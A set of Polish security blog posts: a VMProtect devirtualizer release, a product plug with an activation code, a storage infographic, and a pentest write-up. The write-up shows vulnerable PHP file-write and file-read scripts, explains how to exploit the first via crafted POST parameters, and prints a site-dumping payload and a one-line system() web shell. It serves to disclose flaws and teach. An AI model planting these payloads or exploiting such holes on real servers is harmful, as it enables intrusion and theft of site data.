Dewirtualizer dla VMprotect

No i stało się. Ktoś w końcu opublikował dewirtualizer dla popularnego systemu zabezpieczającego VMprotect, obsługujący jego najnowsze wersje z pełnymi kodami źródłowymi.

Repozytorium https://github.com/can1357/NoVmp

Wraz z jego publikacją pojawiły się powiązane narzędzia do zrzucania pamięci i naprawy importów aplikacji zabezpieczonych VMprotectem:

Wszyscy, którzy polegali jedynie na wirtualizacji kodu chyba muszą się poważnie zastanowić nad bezpieczeństwem swoich aplikacji.

Być może to dobra pora przerzucić się na inny system zabezpieczający aplikacje ze znacznie bardziej bogatym wachlarzem zabezpieczeń i SDK, do którego jeszcze nikomu nie udało się zrobić unpakera 🙂

Mokry sen pentestera, czyli pentesting na wesoło

Podczas ostatniej sesji pentestów u klienta odkryłem na serwerze skrypt pozostawiony przez dewelopera, który projektował system lata temu.

Skrypt, publicznie dostępny (jego adres był wysyłany do klientów), był wykorzystywany przez jeden z komponentów do zapisywania logów na serwerze, w bardzo oryginalny sposób.

Nie wiem nawet jak to skomentować, po prostu wam pokażę kod:

<?php

	/*function deleteDir($path) {
		if (empty($path)) { 
			return false;
		}
		return is_file($path) ?
				@unlink($path) :
				array_map(__FUNCTION__, glob($path.'/*')) == @rmdir($path);
	}

	deleteDir('xxx');
	die;*/

	$filename = $_REQUEST["xvar"];
	$user = $_REQUEST["yvar"];
	$xyz = $_REQUEST["zvar"];

	chdir('xxx');

	$hfile = fopen($filename, "a+");
	
	$fsize=filesize($filename);
	
	if ($fsize==0){
		fwrite($hfile, $user."\r\n\r\n");
	}
	
	fwrite($hfile, date("r")." - ".$xyz."\r\n");
	
	echo "1";

?>

No więc co się tutaj dzieje? Ten skrypt po prostu pobiera parametry z zapytania POST lub GET i wykorzystuje ich treść do nadpisania istniejącego lub stworzenia nowego pliku na serwerze w podkatalogu „xxx”.

Problem polega na tym, że nie jest przeprowadzona żadna walidacja i możliwe jest stworzenie dowolnego pliku w dowolnym katalogu systemu, także skryptów PHP.

Jak wykorzystać tę lukę?

Kreatywnie. To na pewno. I tak żeby klient zrozumiał, że to nie są żarty. Należy w tym celu skonstruować zapytanie POST do serwera i odpowiednio ustawić parametry:

  1. „xvar” – w tym parametrze zapiszemy nazwę nowo utworzonego skryptu PHP
  2. „yvar” – będzie zawierać treść kodu PHP z tagiem otwierający skrypt <?php i tagiem na końcu, który będzie otwierał wielolinijkowy komentarz PHP „/*”, ponieważ po tej zmiennej zapisywana jest data i zepsułoby to strukturę kodu PHP
  3. „zvar” – tym parametrem zamkniemy wielolinijkowy komenarz PHP „*/* oraz domkniemy tagi skryptu PHP „?>”

Pobieranie zawartości całej strony

Poniższy skrypt został tak zapisany, że wykorzystując rozszerzenie ZIP dla PHP tworzy archiwum (bez kompresji, żeby nie wydłużać czasu działania skryptu) ze wszystkimi plikami znajdującymi się na stronie.

<?php $r = realpath('../');$z = new ZipArchive();$z->open('dump.zip', ZipArchive::CREATE | ZipArchive::OVERWRITE); $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($r),	RecursiveIteratorIterator::LEAVES_ONLY); foreach ($files as $name => $file) { if (!$file->isDir()) { $filePath = $file->getRealPath(); $relativePath = substr($filePath, strlen($r) + 1); $z->addFile($filePath, $relativePath); $z->setCompressionName($relativePath, ZipArchive::CM_STORE); } } $z->close(); /* 

Do stworzenia tego skryptu na serwerze wykorzystując znalezioną podatność wykorzystałem rozszerzenie dla Chrome – RestMan. Po ustawieniu rodzaju zapytania (POST) i parametrów, wadliwy skrypt zwrócił „1” co jak widać świadczy o tym, że wykonał się do końca.

Teraz wystarczy wpisać w przeglądarkę adres witryny i nazwę skryptu, znajduje się on w katalogu „xxx/dump.php” i jeśli wszystko pójdzie ok, stworzy „piętro wyżej” archiwum ZIP z całą zawartością strony.

Problem może być czas potrzeby do działania skryptu PHP, ograniczony ustawieniami w pliku konfiguracyjnym php.ini. Można go sobie wydłużyć wykonując funkcję PHP set_time_limit(10 * 60); zaraz na początku skryptu.

Zdalna powłoka

Z ciekawszych rzeczy, które można podrzucić jest zdalna powłoka, którą można wykorzystać do zdalnego wykonywania poleceń, dzięki funkcji system() wbudowanej w PHP:

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die(); } /*

Funkcja ta może być i często jest wyłączona w konfiguracji PHP, ale warto o tym wiedzieć.

Czy to w ogóle błąd?

Zastanawiałem się nad tym chwilę, bo adres skryptu był wysyłany do klientów systemu po określonej akcji i nie mogli mieć świadomości, co się dzieje po jego wykonaniu tzn. że w podkatalogu „xxx” tworzone są nowe pliki. Bo skąd?

Jednak dalsze testy tego archaicznego systemu pozwoliły odnaleźć innego kwiatka, który tego wyżej bije na głowę:

<?php
// downloading a file
	$filename = $_GET['filename'];

// fix for IE catching or PHP bug issue

	header("Pragma: public");
	header("Expires: 0"); // set expiration time
	header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
	
// browser must download file from server instead of cache

// force download dialog

	header("Content-Type: application/force-download");
	header("Content-Type: application/octet-stream");
	header("Content-Type: application/download");

// use the Content-Disposition header to supply a recommended filename and
// force the browser to display the save dialog.

	header("Content-Disposition: attachment; filename=".basename($filename).";");

/*
The Content-transfer-encoding header should be binary, since the file will be read
directly from the disk and the raw bytes passed to the downloading computer.
The Content-length header is useful to set for downloads. The browser will be able to
show a progress meter as a file downloads. The content-lenght can be determines by
filesize function returns the size of a file.
*/

	header("Content-Transfer-Encoding: binary");
	header("Content-Length: ".filesize($filename));

	@readfile($filename);
	
	exit(0);
	
?>

To raczej trudno pobić.

Skrypt pozwala pobrać dowolny plik z serwera, wystarczy np. ustawić parametr „filename” na „index.php” lub jakiś inny, często używany plik jak „config.php”, żeby dobrać się do reszty systemu.

Klient zaskoczony

Po wskazaniu błędów i zaprezentowaniu możliwości klient był zaskoczony, że takie coś w ogóle było możliwe, jednak wynikało to z wieku systemu i metod tworzenia oprogramowania wykorzystywanych lata temu, których już raczej nie doświadczymy. Chociaż, kto wie ile jeszcze takich starych kwiatków wisi na produkcji 🙂

Szyfrowanie stringów i plików z poziomu Visual Studio Code

Przez ostatni tydzień pisałem rozszerzenie dla darmowego środowiska programistycznego Visual Studio Code, które pozwala na bezpośrednie szyfrowanie stringów i plików w edytorze IDE wykorzystując mój projekt StringEncrypt.

Rozszerzenie pozwala w prosty sposób wstawiać zaszyfrowane ciągi tekstowe lub zaszyfrowaną zawartość wybranego pliku (czy to tekstowego, czy binarnego) w edytorze środowiska programowania.

Nie trzeba ręcznie szyfrować stringów wykorzystując jakieś proste xorowanie, albo męczyć się z importowaniem różnych dziwnych bibliotek kryptograficznych (i modlić się, żeby się wszystko poprawnie skompilowało), żeby zaszyfrować mały string lub jakiś plik.

1. Wstawianie nowego zaszyfrowanego tekstu

  1. Wystarczy otworzyć menu kontekstowe
  2. Wybrać Insert Encrypted String
  3. Wpisać label dla zaszyfrowanego stringa
  4. Wpisać zawartość stringa
Wstawianie zaszyfrowanego tekstu

2. Szyfrowanie zaznaczonego tekstu

  1. Należy zaznaczyć dowolny tekst
  2. Z menu kontekstowego wybrać Encrypt Selected Text
  3. Wpisać label dla zaszyfrowanego string
Szyfrowanie zaznaczonego tekstu

3. Wstawianie zaszyfrowanego pliku

  1. Z menu kontekstowego należy wybrać Insert Encrypted File
  2. Należy wskazać plik do zaszyfrowania (4 MB max.)
  3. Wpisać label dla zaszyfrowanego pliku
Wstawianie zaszyfrowanego pliku

Jak to działa?

Całość opiera się na polimorficznym silniku projektu StringEncrypt, generującym każdorazowo losowy kod deszyfrujący w wybranym języku programowania (których jest całkiem sporo).

Jak zainstalować?

Rozszerzenie można zainstalować bezpośrednio z marketu Visual Studio Code:

https://marketplace.visualstudio.com/items?itemName=PELock.stringencrypt

Darmowy kod aktywacyjny

Dla czytelników SecNews z okazji wydania wtyczki przygotowałem darmowy kod aktywacyjny:

4CD3-B06E-0CE5-ECD8

Korzystajcie póki nie wygaśnie 😉

Jak zbudowany jest dysk HDD, SSD, pendrive i karty microSD?

Jeśli kiedykolwiek zastanawialiście się, jak zbudowane są popularne nośniki danych jak dyski HDD/SSD czy pendrive USB, poniżej znajdziecie infografiki prezentujące ich wewnętrzne komponenty oraz funkcje.

Budowa dysku twardego HDD
Budowa dysku SSD Solid State Drive
Budowa pendrive USB Flash
Budowa karty microSD

Infografiki w pełnej rozdzielczości i do pobrania, dostępne na moim forum o odzyskiwaniu danych:

https://odzyskiwaniedanych.net.pl/infografika-budowa-dysku-twardego-hdd-ssd-usb-pendrive-microsd

Zachęcam do ich wykorzystania we własnych projektach czy prezentacjach. Dajcie znać, jeśli się wam przydały.